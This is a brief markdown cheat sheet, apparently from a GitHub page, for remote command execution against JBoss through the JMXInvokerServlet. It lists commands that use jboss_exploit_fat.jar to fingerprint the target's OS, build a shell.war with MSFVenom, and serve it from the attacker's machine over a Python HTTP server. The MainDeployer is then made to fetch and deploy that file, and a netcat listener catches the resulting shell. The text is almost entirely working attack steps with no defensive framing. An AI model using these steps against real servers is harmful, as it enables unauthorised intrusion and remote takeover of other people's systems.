Exploit : https://github.com/az0ne/jboss_autoexploit
Name and Verison Information

java -jar jboss_exploit_fat.jar -i http://Target_IP:PORT/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

java -jar jboss_exploit_fat.jar -i http://Target_IP:PORT/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

File Upload (Deploy)

MSFVenom with create shell.war file

Folder containing shell.war file

Python -m SimpleHTTPServer 8000

java -jar jboss_exploit_fat.jar -i http:/Target_IP:PORT/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://My_IP:8000/shell.war

http:/Target_IP:PORT/shell.war

Listenin Port ( exploit/multi/handler or nc -lvp port )

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution.md

JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution.md

Files

JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution​.md

Latest commit

History

JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution​.md

File metadata and controls

JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution.md

JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution.md